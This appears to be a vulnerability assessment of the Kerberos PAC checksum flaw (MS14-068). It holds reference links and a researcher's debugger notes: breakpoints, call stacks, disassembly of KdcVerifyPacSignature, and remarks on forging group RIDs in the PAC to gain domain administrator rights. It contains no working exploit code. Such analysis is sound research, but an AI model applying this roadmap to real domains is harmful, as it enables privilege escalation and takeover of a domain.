The Kerberos Key Distribution Center (KDC) in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 allows remote authenticated domain users to obtain domain administrator privileges via a forged signature in a ticket, as exploited in the wild in November 2014, aka “Kerberos Checksum Vulnerability.”
Recent assessments:
wchen-r7 at September 12, 2019 6:07pm UTC reported:
Troubleshooting kerberos on windows
<http://technet.microsoft.com/en-us/library/cc738673(WS.10).aspx>
<http://www.itninja.com/blog/view/taming-the-three-headed-beast-kerberos>
Golden and silver ticket
<https://www.youtube.com/watch?v=-IMrNGPZTl0> (blackhat)
<http://www.slideshare.net/gentilkiwi/bluehat-2014realitybites>
<http://www.nosuchcon.org/talks/2014/D2_02_Benjamin_Delpy_Mimikatz.pdf>
<http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos>
<http://blog.gentilkiwi.com/securite/mimikatz/golden-ticket-kerberos> (ticket format)
<https://github.com/gentilkiwi/mimikatz/wiki/module-~-kerberos>
MS-PAC: Privilege Attribute Certificate Data Structure
<http://msdn.microsoft.com/en-us/library/cc237917.aspx>
Microsoft Authorization Data Specification
<http://mirror.die.net/banned/microsoft-kerberos-extensions.html>
Authentication structures:
<http://msdn.microsoft.com/en-us/library/windows/desktop/aa378120(v=vs.85).aspx>
More Kerberos fun with PAC’s- decrypt the PAC
<http://i1.blogs.msdn.com/b/spatdsg/archive/2009/03/26/more-kerberos-fun-with-pac-s.aspx>
Kerberos PAC Validation… what is it?
<http://blogs.msdn.com/b/spatdsg/archive/2007/03/07/pac-validation.aspx>
Kerberos on windows
<https://www.blackhat.com/presentations/bh-europe-09/Bouillon/BlackHat-Europe-09-Bouillon-Taming-the-Beast-Kerberous-whitepaper.pdf>
<http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos>
Windows 2003: Security event IDs related to Kerberos: 540 (logon) / 538 (logoff)
I'm pretty sure the information to forge exists inside the service Kerberos ticket.
In my opinion the idea is to forge the KERB_VALIDATION_INFO. It contains:
ULONG GroupCount;
[size_is(GroupCount)] PGROUP_MEMBERSHIP GroupIds;
Where:
typedef struct _GROUP_MEMBERSHIP {
ULONG RelativeId;
ULONG Attributes;
} *PGROUP_MEMBERSHIP;
Modifying the RelativeId in the service ticket is, I think, the way related
to the privilege escalation (See ticket_samples.txt for KERB_VALIDATION_INFO dump).
But… how to tamper with that information? Since the kerberos communication (server
running on 88/udp) happens through lsass (running as system), tampering with communications
doesn't look like a good idea. Even worse, the KERB_VALIDATION_INFO is located inside the
ticket, which travels encrypted. I NEED TO CHECK CAREFULLY WHERE THE PAC IS ADDED;
HOPEFULLY IT'S IN A BLOB CIPHERED WITH THE USER PRIVATE KEY. CANNOT REMEMBER JUST NOW, TODO!
Just remembering: cached tickets maybe can be tampered with. TODO: review
bp kdcsvc!I_GetAsTicket ".echo I_GetAsTicket; g"
Reached through _KdcGetTicket (also an export)
bp kdcsvc!KdcVerifyPacSignature ".echo KdcVerifyPacSignature; g"
This one is reached when handling TGT Requests, apparently
HandleTGSRequest –> GetTGSTicket…
bp kdcsvc!KdcVerifyPac ".echo KdcVerifyPac; g"
It’s an export, also reached through “CredentialUpdateFree”
When I authenticate to a service, IIS, through Kerberos, this is the call sequence:
I_GetAsTicket
KdcVerifyPacSignature
KdcVerifyPacSignature
I_GetAsTicket
KdcVerifyPacSignature
Okay, let's check what happens when I add the kerberos function:
kd> bp kerberos!KerbVerifyPacsignature ".echo kerberos!KerbVerifyPacsignature; g"
kd> g
I_GetAsTicket
KdcVerifyPacSignature
kerberos!KerbVerifyPacsignature
I_GetAsTicket
KdcVerifyPacSignature
kerberos!KerbVerifyPacsignature
Makes sense! Let's check some call stacks to see where things come from:
kd> bl
0 e 63a8b814 0001 (0001) KDCSVC!I_GetASTicket ".echo I_GetAsTicket; kb 4; g"
1 e 63a89013 0001 (0001) KDCSVC!KdcVerifyPacSignature ".echo KdcVerifyPacSignature; kb 4; g"
2 e 63a8d3ad 0001 (0001) KDCSVC!KdcVerifyPac ".echo KdcVerifyPac; kb 4; g"
3 e 71ca8587 0001 (0001) kerberos!KerbVerifyPacSignature ".echo kerberos!KerbVerifyPacsignature; kb 4; g"
I_GetAsTicket
ChildEBP RetAddr Args to Child
04e4fe38 63a8b80a 050ae688 001583e8 04e4feb0 KDCSVC!I_GetASTicket
04e4fed8 63a87305 00000000 050ae688 001149a8 KDCSVC!KdcGetTicket+0x1b5
04e4ff38 71fd1700 0015b9e0 00000137 00000000 KDCSVC!KdcAtqDgIoCompletion+0x129
04e4ff58 71fd1858 00000137 00000000 0015b9e4 NTDSATQ!ATQ_CONTEXT::IOCompletion+0x31
KdcVerifyPacSignature
ChildEBP RetAddr Args to Child
04e4f740 63a89f6f 00145238 04e4f91c 00000250 KDCSVC!KdcVerifyPacSignature
04e4f770 63a89543 00145238 000ec8f0 04e4f91c KDCSVC!KdcVerifyAndResignPac+0xb3
04e4f83c 63a87125 04e4f880 04e4fe74 00000000 KDCSVC!KdcInsertAuthorizationData+0x1d6
04e4f99c 63a85055 000ec8f0 04e4fea0 04e4fe98 KDCSVC!I_GetTGSTicket+0x729
kerberos!KerbVerifyPacsignature
ChildEBP RetAddr Args to Child
00aef7b8 71cb1ef3 00aefa70 0013d8f0 00000250 kerberos!KerbVerifyPacSignature
00aef8fc 71cb1159 00000001 00aefab0 0017c1e8 kerberos!KerbCreateTokenFromTicket+0x1de
00aefaec 4ab860d2 0016cce0 00000000 3c9b6229 kerberos!SpAcceptLsaModeContext+0xb09
00aefb60 4abc94a8 00aefc18 00aefbf8 00aefbe0 LSASRV!WLsaAcceptContext+0x139
I_GetAsTicket
ChildEBP RetAddr Args to Child
04e4fe38 63a8b80a 050b73b8 001583e8 04e4feb0 KDCSVC!I_GetASTicket
04e4fed8 63a87305 00000000 050b73b8 001149a8 KDCSVC!KdcGetTicket+0x1b5
04e4ff38 71fd1700 0015bc10 00000137 00000000 KDCSVC!KdcAtqDgIoCompletion+0x129
04e4ff58 71fd1858 00000137 00000000 0015bc14 NTDSATQ!ATQ_CONTEXT::IOCompletion+0x31
KdcVerifyPacSignature
ChildEBP RetAddr Args to Child
04e4f740 63a89f6f 00145418 04e4f91c 00000250 KDCSVC!KdcVerifyPacSignature
04e4f770 63a89543 00145418 000ec8f0 04e4f91c KDCSVC!KdcVerifyAndResignPac+0xb3
04e4f83c 63a87125 04e4f880 04e4fe74 00000000 KDCSVC!KdcInsertAuthorizationData+0x1d6
04e4f99c 63a85055 000ec8f0 04e4fea0 04e4fe98 KDCSVC!I_GetTGSTicket+0x729
kerberos!KerbVerifyPacsignature
ChildEBP RetAddr Args to Child
00c6f7b8 71cb1ef3 00c6fa70 0013d8f0 00000250 kerberos!KerbVerifyPacSignature
00c6f8fc 71cb1159 00000001 00c6fab0 0017c190 kerberos!KerbCreateTokenFromTicket+0x1de
00c6faec 4ab860d2 0016cce0 00000000 3f4a60da kerberos!SpAcceptLsaModeContext+0xb09
00c6fb60 4abc94a8 00c6fc18 00c6fbf8 00c6fbe0 LSASRV!WLsaAcceptContext+0x139
So, obviously I_GetAsTicket is called through the first query (AS), and KdcVerifyPacSignature and
kerberos!KerbVerifyPacsignature are called on the second request (TGT). Looks like the PAC is
parsed/verified in the second query (TGT, makes sense).
[*] Other backtraces for my review while logging in the domain from XP SP3 client
kd> g
Breakpoint 4 hit
kerberos!PAC_UnMarshal:
001b:71d2d109 8bff mov edi,edi
kd> kb
ChildEBP RetAddr Args to Child
009cf980 71d17acb 000b8780 00000290 009cfd84 kerberos!PAC_UnMarshal
009cf9fc 71d02dcb 000fbd18 009cfc34 000d62b8 kerberos!KerbCreateTokenFromLogonTicket+0x2ec
009cfc8c 75757814 009cfea8 00000002 000d62b8 kerberos!LsaApLogonUserEx2+0xa9e
009cfcf8 75742941 009cfea8 00000002 000e23c8 LSASRV!NegLogonUserEx2+0x21d
009cfe98 75742286 009cfea8 000b6040 00107500 LSASRV!LsapAuApiDispatchLogonUser+0x335
009cfeac 75739429 00107500 000b4e90 000b6040 LSASRV!LpcLsaLogonUser+0x22
009cfec4 7573934d 00107500 757cf738 000c7968 LSASRV!DispatchAPI+0x46
009cff50 75738ca2 000b4e90 009cff98 7c809c55 LSASRV!LpcHandler+0x153
009cff74 75738d66 0009bd98 00000000 00a4fab0 LSASRV!SpmPoolThreadBase+0xb9
009cffb4 7c80b713 000c34e0 00000000 00a4fab0 LSASRV!LsapThreadBase+0x91
009cffec 00000000 75738d13 000c34e0 00000000 kernel32!BaseThreadStart+0x37
kd> g
Breakpoint 5 hit
kerberos!PAC_ReMarshal:
001b:71d2d188 8bff mov edi,edi
kd> kb
ChildEBP RetAddr Args to Child
009cf89c 71d15b25 000b8780 00000290 009cf9cc kerberos!PAC_ReMarshal
009cf96c 71d17b42 009cf9c4 000b8780 00000290 kerberos!KerbVerifyPacSignature+0x185
009cf9fc 71d02dcb 000fbd18 009cfc34 000d62b8 kerberos!KerbCreateTokenFromLogonTicket+0x363
009cfc8c 75757814 009cfea8 00000002 000d62b8 kerberos!LsaApLogonUserEx2+0xa9e
009cfcf8 75742941 009cfea8 00000002 000e23c8 LSASRV!NegLogonUserEx2+0x21d
009cfe98 75742286 009cfea8 000b6040 00107500 LSASRV!LsapAuApiDispatchLogonUser+0x335
009cfeac 75739429 00107500 000b4e90 000b6040 LSASRV!LpcLsaLogonUser+0x22
009cfec4 7573934d 00107500 757cf738 000c7968 LSASRV!DispatchAPI+0x46
009cff50 75738ca2 000b4e90 009cff98 7c809c55 LSASRV!LpcHandler+0x153
009cff74 75738d66 0009bd98 00000000 00a4fab0 LSASRV!SpmPoolThreadBase+0xb9
009cffb4 7c80b713 000c34e0 00000000 00a4fab0 LSASRV!LsapThreadBase+0x91
009cffec 00000000 75738d13 000c34e0 00000000 kernel32!BaseThreadStart+0x37
kd> g
Breakpoint 4 hit
kerberos!PAC_UnMarshal:
001b:71d2d109 8bff mov edi,edi
kd> kb
ChildEBP RetAddr Args to Child
009cf89c 71d15c04 000b8780 00000290 009cf9cc kerberos!PAC_UnMarshal
009cf96c 71d17b42 009cf9c4 000b8780 00000290 kerberos!KerbVerifyPacSignature+0x264
009cf9fc 71d02dcb 000fbd18 009cfc34 000d62b8 kerberos!KerbCreateTokenFromLogonTicket+0x363
009cfc8c 75757814 009cfea8 00000002 000d62b8 kerberos!LsaApLogonUserEx2+0xa9e
009cfcf8 75742941 009cfea8 00000002 000e23c8 LSASRV!NegLogonUserEx2+0x21d
009cfe98 75742286 009cfea8 000b6040 00107500 LSASRV!LsapAuApiDispatchLogonUser+0x335
009cfeac 75739429 00107500 000b4e90 000b6040 LSASRV!LpcLsaLogonUser+0x22
009cfec4 7573934d 00107500 757cf738 000c7968 LSASRV!DispatchAPI+0x46
009cff50 75738ca2 000b4e90 009cff98 7c809c55 LSASRV!LpcHandler+0x153
009cff74 75738d66 0009bd98 00000000 00a4fab0 LSASRV!SpmPoolThreadBase+0xb9
009cffb4 7c80b713 000c34e0 00000000 00a4fab0 LSASRV!LsapThreadBase+0x91
009cffec 00000000 75738d13 000c34e0 00000000 kernel32!BaseThreadStart+0x37
kd> g
Breakpoint 1 hit
kerberos!PAC_UnmarshallValidationInfo:
001b:71d2d466 8bff mov edi,edi
kd> kb
ChildEBP RetAddr Args to Child
009cf898 71d15cd6 009cf9f0 000b87c8 000001f0 kerberos!PAC_UnmarshallValidationInfo
009cf96c 71d17b42 009cf9c4 000b8780 00000290 kerberos!KerbVerifyPacSignature+0x336
009cf9fc 71d02dcb 000fbd18 009cfc34 000d62b8 kerberos!KerbCreateTokenFromLogonTicket+0x363
009cfc8c 75757814 009cfea8 00000002 000d62b8 kerberos!LsaApLogonUserEx2+0xa9e
009cfcf8 75742941 009cfea8 00000002 000e23c8 LSASRV!NegLogonUserEx2+0x21d
009cfe98 75742286 009cfea8 000b6040 00107500 LSASRV!LsapAuApiDispatchLogonUser+0x335
009cfeac 75739429 00107500 000b4e90 000b6040 LSASRV!LpcLsaLogonUser+0x22
009cfec4 7573934d 00107500 757cf738 000c7968 LSASRV!DispatchAPI+0x46
009cff50 75738ca2 000b4e90 009cff98 7c809c55 LSASRV!LpcHandler+0x153
009cff74 75738d66 0009bd98 00000000 00a4fab0 LSASRV!SpmPoolThreadBase+0xb9
009cffb4 7c80b713 000c34e0 00000000 00a4fab0 LSASRV!LsapThreadBase+0x91
009cffec 00000000 75738d13 000c34e0 00000000 kernel32!BaseThreadStart+0x37
kd> g
Breakpoint 3 hit
kerberos!PAC_DecodeValidationInformation:
001b:71d2cf2e 6a14 push 14h
kd> kb
ChildEBP RetAddr Args to Child
009cf884 71d2d47d 000b87c8 000001f0 009cf9f0 kerberos!PAC_DecodeValidationInformation
009cf898 71d15cd6 009cf9f0 000b87c8 000001f0 kerberos!PAC_UnmarshallValidationInfo+0x17
009cf96c 71d17b42 009cf9c4 000b8780 00000290 kerberos!KerbVerifyPacSignature+0x336
009cf9fc 71d02dcb 000fbd18 009cfc34 000d62b8 kerberos!KerbCreateTokenFromLogonTicket+0x363
009cfc8c 75757814 009cfea8 00000002 000d62b8 kerberos!LsaApLogonUserEx2+0xa9e
009cfcf8 75742941 009cfea8 00000002 000e23c8 LSASRV!NegLogonUserEx2+0x21d
009cfe98 75742286 009cfea8 000b6040 00107500 LSASRV!LsapAuApiDispatchLogonUser+0x335
009cfeac 75739429 00107500 000b4e90 000b6040 LSASRV!LpcLsaLogonUser+0x22
009cfec4 7573934d 00107500 757cf738 000c7968 LSASRV!DispatchAPI+0x46
009cff50 75738ca2 000b4e90 009cff98 7c809c55 LSASRV!LpcHandler+0x153
009cff74 75738d66 0009bd98 00000000 00a4fab0 LSASRV!SpmPoolThreadBase+0xb9
009cffb4 7c80b713 000c34e0 00000000 00a4fab0 LSASRV!LsapThreadBase+0x91
009cffec 00000000 75738d13 000c34e0 00000000 kernel32!BaseThreadStart+0x37
kd> g
Breakpoint 8 hit
kerberos!PPAC_IDL_VALIDATION_INFO_Decode:
001b:71d2d6f5 8bff mov edi,edi
kd> kb
ChildEBP RetAddr Args to Child
009cf844 71d2cf7f 000936f0 009cf9f0 000b89c0 kerberos!PPAC_IDL_VALIDATION_INFO_Decode
009cf884 71d2d47d 000b87c8 000001f0 009cf9f0 kerberos!PAC_DecodeValidationInformation+0x51
009cf898 71d15cd6 009cf9f0 000b87c8 000001f0 kerberos!PAC_UnmarshallValidationInfo+0x17
009cf96c 71d17b42 009cf9c4 000b8780 00000290 kerberos!KerbVerifyPacSignature+0x336
009cf9fc 71d02dcb 000fbd18 009cfc34 000d62b8 kerberos!KerbCreateTokenFromLogonTicket+0x363
009cfc8c 75757814 009cfea8 00000002 000d62b8 kerberos!LsaApLogonUserEx2+0xa9e
009cfcf8 75742941 009cfea8 00000002 000e23c8 LSASRV!NegLogonUserEx2+0x21d
009cfe98 75742286 009cfea8 000b6040 00107500 LSASRV!LsapAuApiDispatchLogonUser+0x335
009cfeac 75739429 00107500 000b4e90 000b6040 LSASRV!LpcLsaLogonUser+0x22
009cfec4 7573934d 00107500 757cf738 000c7968 LSASRV!DispatchAPI+0x46
009cff50 75738ca2 000b4e90 009cff98 7c809c55 LSASRV!LpcHandler+0x153
009cff74 75738d66 0009bd98 00000000 00a4fab0 LSASRV!SpmPoolThreadBase+0xb9
009cffb4 7c80b713 000c34e0 00000000 00a4fab0 LSASRV!LsapThreadBase+0x91
009cffec 00000000 75738d13 000c34e0 00000000 kernel32!BaseThreadStart+0x37
kd> g
[*] More breakpoints from the XP SP3 client: looks like there are two paths, one to
get the TGT ticket and one to get the service ticket. The last one is the interesting
one, I think.
kd> kb
ChildEBP RetAddr Args to Child
0007f4c0 71cfbc26 00103828 000ed248 000c2f48 kerberos!KerbCacheTicket
0007f68c 71cf3611 00101ce0 000f6c30 00000000 kerberos!KerbGetAuthenticationTicket+0xa77
0007f760 71cf33c8 00101ce0 000f6c30 00000000 kerberos!KerbGetTicketGrantingTicket+0x2f4
0007f794 71cf1db1 00000000 000f6c30 00000000 kerberos!KerbGetTicketForCredential+0x5d
0007f7f4 71cf2d85 000f6c30 80000002 00000000 kerberos!KerbReferenceCredential+0x12a
0007f9a8 7573c293 000f6c30 00000000 0007fe80 kerberos!SpInitLsaModeContext+0xae3
0007fa20 7573ca9a 0007fbb0 0007fb90 0007fe80 LSASRV!WLsaInitContext+0x154
0007fc14 7575dedc 00000000 000a5ad8 0007fe80 LSASRV!NegBuildRequestToken+0x53d
0007fc48 7575de92 00108ef0 0007fe80 00000002 LSASRV!NegGenerateInitialToken+0x28
0007fcac 7573c293 00108ef0 00000000 0007fe80 LSASRV!NegInitLsaModeContext+0x3e6
0007fd24 7573c17c 000f9bf8 000f9c00 0007fe80 LSASRV!WLsaInitContext+0x154
0007feac 75739429 000f9bd0 000b5100 000f9ce0 LSASRV!LpcInitContext+0x1a2
0007fec4 7573934d 000f9bd0 757cf738 0009af50 LSASRV!DispatchAPI+0x46
0007ff50 75738ca2 000b5100 0007ff98 7c809c55 LSASRV!LpcHandler+0x153
0007ff74 75738d66 0009bd98 00000000 00a4fab0 LSASRV!SpmPoolThreadBase+0xb9
0007ffb4 7c80b713 000d3758 00000000 00a4fab0 LSASRV!LsapThreadBase+0x91
0007ffec 00000000 75738d13 000d3758 00000000 kernel32!BaseThreadStart+0x37
kd> g
Breakpoint 13 hit
kerberos!KerbCacheTicket:
001b:71cf9a79 8bff mov edi,edi
kd> kb
ChildEBP RetAddr Args to Child
0007f6ec 71cf9a6f 00103818 000d5240 000c2f48 kerberos!KerbCacheTicket
0007f7cc 71cf722e 00101ce0 000f6c30 00000000 kerberos!KerbGetServiceTicket+0x893
0007f9a8 7573c293 00000002 00000000 0007fe80 kerberos!SpInitLsaModeContext+0xd60
0007fa20 7573ca9a 0007fbb0 0007fb90 0007fe80 LSASRV!WLsaInitContext+0x154
0007fc14 7575dedc 00000000 000a5ad8 0007fe80 LSASRV!NegBuildRequestToken+0x53d
0007fc48 7575de92 00108ef0 0007fe80 00000002 LSASRV!NegGenerateInitialToken+0x28
0007fcac 7573c293 00108ef0 00000000 0007fe80 LSASRV!NegInitLsaModeContext+0x3e6
0007fd24 7573c17c 000f9bf8 000f9c00 0007fe80 LSASRV!WLsaInitContext+0x154
0007feac 75739429 000f9bd0 000b5100 000f9ce0 LSASRV!LpcInitContext+0x1a2
0007fec4 7573934d 000f9bd0 757cf738 0009af50 LSASRV!DispatchAPI+0x46
0007ff50 75738ca2 000b5100 0007ff98 7c809c55 LSASRV!LpcHandler+0x153
0007ff74 75738d66 0009bd98 00000000 00a4fab0 LSASRV!SpmPoolThreadBase+0xb9
0007ffb4 7c80b713 000d3758 00000000 00a4fab0 LSASRV!LsapThreadBase+0x91
0007ffec 00000000 75738d13 000d3758 00000000 kernel32!BaseThreadStart+0x37
kd> g
Reaching the important point in my case:
kd> uf KDCSVC!KdcVerifyPacSignature
KDCSVC!KdcVerifyPacSignature:
63a89013 8bff mov edi,edi
63a89015 55 push ebp
63a89016 8bec mov ebp,esp
63a89018 81eca8000000 sub esp,0A8h
63a8901e a10010ab63 mov eax,dword ptr [KDCSVC!__security_cookie (63ab1000)]
63a89023 53 push ebx
63a89024 56 push esi
63a89025 8b7514 mov esi,dword ptr [ebp+14h]
63a89028 8945fc mov dword ptr [ebp-4],eax
63a8902b 8b4508 mov eax,dword ptr [ebp+8]
63a8902e 57 push edi
63a8902f 8945ac mov dword ptr [ebp-54h],eax
63a89032 8b450c mov eax,dword ptr [ebp+0Ch]
63a89035 6a0f push 0Fh
63a89037 33db xor ebx,ebx
63a89039 8945a8 mov dword ptr [ebp-58h],eax
63a8903c 59 pop ecx
63a8903d ff7510 push dword ptr [ebp+10h]
63a89040 66899d58ffffff mov word ptr [ebp-0A8h],bx
63a89047 33c0 xor eax,eax
63a89049 8dbd5affffff lea edi,[ebp-0A6h]
63a8904f f3ab rep stos dword ptr es:[edi]
63a89051 56 push esi
63a89052 8975b0 mov dword ptr [ebp-50h],esi
63a89055 895dbc mov dword ptr [ebp-44h],ebx
63a89058 895db8 mov dword ptr [ebp-48h],ebx
63a8905b 895db4 mov dword ptr [ebp-4Ch],ebx
63a8905e 66ab stos word ptr es:[edi]
63a89060 e81feeffff call KDCSVC!PAC_UnMarshal (63a87e84)
63a89065 85c0 test eax,eax
63a89067 0f84178d0000 je KDCSVC!KdcVerifyPacSignature+0x261 (63a91d84)
KDCSVC!KdcVerifyPacSignature+0x5a:
63a8906d 8d8558ffffff lea eax,[ebp-0A8h]
63a89073 50 push eax
63a89074 b92810ab63 mov ecx,offset KDCSVC!SecData (63ab1028)
63a89079 e8668bffff call KDCSVC!CSecurityData::GetKrbtgtTicketInfo (63a81be4)
63a8907e 3bc3 cmp eax,ebx
63a89080 8945bc mov dword ptr [ebp-44h],eax
63a89083 0f856c8c0000 jne KDCSVC!KdcVerifyPacSignature+0x72 (63a91cf5)
KDCSVC!KdcVerifyPacSignature+0x7d:
63a89089 53 push ebx
63a8908a 6a06 push 6
63a8908c 56 push esi
63a8908d e846ecffff call KDCSVC!PAC_Find (63a87cd8)
63a89092 8bd8 mov ebx,eax
63a89094 85db test ebx,ebx
63a89096 0f8488010000 je KDCSVC!KdcVerifyPacSignature+0x2d1 (63a89224)
KDCSVC!KdcVerifyPacSignature+0x90:
63a8909c 8b4b04 mov ecx,dword ptr [ebx+4]
63a8909f 83f904 cmp ecx,4
63a890a2 0f827c010000 jb KDCSVC!KdcVerifyPacSignature+0x2d1 (63a89224)
KDCSVC!KdcVerifyPacSignature+0x9c:
63a890a8 8b4308 mov eax,dword ptr [ebx+8]
63a890ab 83c1fc add ecx,0FFFFFFFCh
63a890ae 8d5004 lea edx,[eax+4]
63a890b1 894598 mov dword ptr [ebp-68h],eax
63a890b4 8bc1 mov eax,ecx
63a890b6 c1e902 shr ecx,2
63a890b9 8bf2 mov esi,edx
63a890bb 8d7de8 lea edi,[ebp-18h]
63a890be f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
63a890c0 8bc8 mov ecx,eax
63a890c2 83e103 and ecx,3
63a890c5 f3a4 rep movs byte ptr es:[edi],byte ptr [esi]
63a890c7 8b4b04 mov ecx,dword ptr [ebx+4]
63a890ca 83e904 sub ecx,4
63a890cd 8bfa mov edi,edx
63a890cf 8bd1 mov edx,ecx
63a890d1 c1e902 shr ecx,2
63a890d4 33c0 xor eax,eax
63a890d6 f3ab rep stos dword ptr es:[edi]
63a890d8 6a00 push 0
63a890da 8bca mov ecx,edx
63a890dc 6a07 push 7
63a890de ff75b0 push dword ptr [ebp-50h]
63a890e1 83e103 and ecx,3
63a890e4 f3aa rep stos byte ptr es:[edi]
63a890e6 e8edebffff call KDCSVC!PAC_Find (63a87cd8)
63a890eb 85c0 test eax,eax
63a890ed 89459c mov dword ptr [ebp-64h],eax
63a890f0 0f842e010000 je KDCSVC!KdcVerifyPacSignature+0x2d1 (63a89224)
KDCSVC!KdcVerifyPacSignature+0xea:
63a890f6 8b5004 mov edx,dword ptr [eax+4]
63a890f9 83fa04 cmp edx,4
63a890fc 0f8222010000 jb KDCSVC!KdcVerifyPacSignature+0x2d1 (63a89224)
KDCSVC!KdcVerifyPacSignature+0xf6:
63a89102 8b4808 mov ecx,dword ptr [eax+8]
63a89105 8d7104 lea esi,[ecx+4]
63a89108 894da0 mov dword ptr [ebp-60h],ecx
63a8910b 8d4afc lea ecx,[edx-4]
63a8910e 8bd1 mov edx,ecx
63a89110 c1e902 shr ecx,2
63a89113 ff7510 push dword ptr [ebp+10h]
63a89116 8975a4 mov dword ptr [ebp-5Ch],esi
63a89119 ff75b0 push dword ptr [ebp-50h]
63a8911c 8d7dc0 lea edi,[ebp-40h]
63a8911f f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
63a89121 8bca mov ecx,edx
63a89123 83e103 and ecx,3
63a89126 f3a4 rep movs byte ptr es:[edi],byte ptr [esi]
63a89128 8b4804 mov ecx,dword ptr [eax+4]
63a8912b 8b7da4 mov edi,dword ptr [ebp-5Ch]
63a8912e 83e904 sub ecx,4
63a89131 8bd1 mov edx,ecx
63a89133 c1e902 shr ecx,2
63a89136 33c0 xor eax,eax
63a89138 f3ab rep stos dword ptr es:[edi]
63a8913a 8bca mov ecx,edx
63a8913c 83e103 and ecx,3
63a8913f f3aa rep stos byte ptr es:[edi]
63a89141 e810e5ffff call KDCSVC!PAC_ReMarshal (63a87656)
63a89146 84c0 test al,al
63a89148 0f84d6000000 je KDCSVC!KdcVerifyPacSignature+0x2d1 (63a89224)
KDCSVC!KdcVerifyPacSignature+0x142:
63a8914e 8d45b8 lea eax,[ebp-48h]
63a89151 50 push eax
63a89152 8b4598 mov eax,dword ptr [ebp-68h]
63a89155 ff30 push dword ptr [eax]
63a89157 e8538affff call KDCSVC!CDLocateCheckSum (63a81baf)
63a8915c 85c0 test eax,eax
63a8915e 0f8ce38b0000 jl KDCSVC!KdcVerifyPacSignature+0x224 (63a91d47)
KDCSVC!KdcVerifyPacSignature+0x158:
63a89164 8b55b8 mov edx,dword ptr [ebp-48h]
63a89167 837a0414 cmp dword ptr [edx+4],14h // DEBUG HERE IS THE ORIGINAL PATCH
63a8916b 0f87138c0000 ja KDCSVC!KdcVerifyPacSignature+0x261 (63a91d84)
KDCSVC!KdcVerifyPacSignature+0x165:
63a89171 8b4a20 mov ecx,dword ptr [edx+20h]
63a89174 85c9 test ecx,ecx
63a89176 8d45b4 lea eax,[ebp-4Ch]
63a89179 50 push eax
63a8917a 6a11 push 11h
63a8917c 0f857e8b0000 jne KDCSVC!KdcVerifyPacSignature+0x172 (63a91d00)
KDCSVC!KdcVerifyPacSignature+0x183:
63a89182 8b45ac mov eax,dword ptr [ebp-54h]
63a89185 ff7004 push dword ptr [eax+4]
63a89188 ff7008 push dword ptr [eax+8]
63a8918b ff521c call dword ptr [edx+1Ch]
KDCSVC!KdcVerifyPacSignature+0x18f:
63a8918e 85c0 test eax,eax
63a89190 0f8cee8b0000 jl KDCSVC!KdcVerifyPacSignature+0x261 (63a91d84)
KDCSVC!KdcVerifyPacSignature+0x197:
63a89196 ff75b0 push dword ptr [ebp-50h]
63a89199 8b45b8 mov eax,dword ptr [ebp-48h]
63a8919c ff7510 push dword ptr [ebp+10h]
63a8919f ff75b4 push dword ptr [ebp-4Ch]
63a891a2 ff5010 call dword ptr [eax+10h]
63a891a5 8d45d4 lea eax,[ebp-2Ch]
63a891a8 50 push eax
63a891a9 ff75b4 push dword ptr [ebp-4Ch]
63a891ac 8b45b8 mov eax,dword ptr [ebp-48h]
63a891af ff5014 call dword ptr [eax+14h]
63a891b2 8d45b4 lea eax,[ebp-4Ch]
63a891b5 50 push eax
63a891b6 8b45b8 mov eax,dword ptr [ebp-48h]
63a891b9 ff5018 call dword ptr [eax+18h]
63a891bc 8b45b8 mov eax,dword ptr [ebp-48h]
63a891bf 8b4804 mov ecx,dword ptr [eax+4]
63a891c2 8b4304 mov eax,dword ptr [ebx+4]
63a891c5 83e804 sub eax,4
63a891c8 3bc8 cmp ecx,eax
63a891ca 754e jne KDCSVC!KdcVerifyPacSignature+0x2ba (63a8921a)
KDCSVC!KdcVerifyPacSignature+0x1d1:
63a891cc 8d7de8 lea edi,[ebp-18h]
63a891cf 8d75d4 lea esi,[ebp-2Ch]
63a891d2 33c0 xor eax,eax
63a891d4 f3a6 repe cmps byte ptr [esi],byte ptr es:[edi]
63a891d6 7542 jne KDCSVC!KdcVerifyPacSignature+0x2ba (63a8921a)
KDCSVC!KdcVerifyPacSignature+0x1e1:
63a891d8 8b45a8 mov eax,dword ptr [ebp-58h]
63a891db 817820f6010000 cmp dword ptr [eax+20h],1F6h
63a891e2 0f852c8b0000 jne KDCSVC!KdcVerifyPacSignature+0x1f1 (63a91d14)
KDCSVC!KdcVerifyPacSignature+0x2ee:
63a891e8 837dbc29 cmp dword ptr [ebp-44h],29h
63a891ec 0f841e8c0000 je KDCSVC!KdcVerifyPacSignature+0x2f4 (63a91e10)
KDCSVC!KdcVerifyPacSignature+0x340:
63a891f2 837db400 cmp dword ptr [ebp-4Ch],0
63a891f6 5f pop edi
63a891f7 5e pop esi
63a891f8 5b pop ebx
63a891f9 0f85668c0000 jne KDCSVC!KdcVerifyPacSignature+0x349 (63a91e65)
KDCSVC!KdcVerifyPacSignature+0x357:
63a891ff 8d8558ffffff lea eax,[ebp-0A8h]
63a89205 50 push eax
63a89206 e8498cffff call KDCSVC!FreeTicketInfo (63a81e54)
63a8920b 8b4dfc mov ecx,dword ptr [ebp-4]
63a8920e 8b45bc mov eax,dword ptr [ebp-44h]
63a89211 e83f89ffff call KDCSVC!__security_check_cookie (63a81b55)
63a89216 c9 leave
63a89217 c21000 ret 10h
KDCSVC!KdcVerifyPacSignature+0x2ba:
63a8921a 683092a863 push offset KDCSVC!`string' (63a89230)
63a8921f e9bb8b0000 jmp KDCSVC!KdcVerifyPacSignature+0x2bf (63a91ddf)
KDCSVC!KdcVerifyPacSignature+0x2d1:
63a89224 c745bc3c000000 mov dword ptr [ebp-44h],3Ch
63a8922b e9c18b0000 jmp KDCSVC!KdcVerifyPacSignature+0x2d8 (63a91df1)
KDCSVC!KdcVerifyPacSignature+0x72:
63a91cf5 50 push eax
63a91cf6 e884120100 call KDCSVC!KerbMapKerbError (63aa2f7f)
63a91cfb e9f1000000 jmp KDCSVC!KdcVerifyPacSignature+0x2d8 (63a91df1)
KDCSVC!KdcVerifyPacSignature+0x172:
63a91d00 8d45e8 lea eax,[ebp-18h]
63a91d03 50 push eax
63a91d04 8b45ac mov eax,dword ptr [ebp-54h]
63a91d07 ff7004 push dword ptr [eax+4]
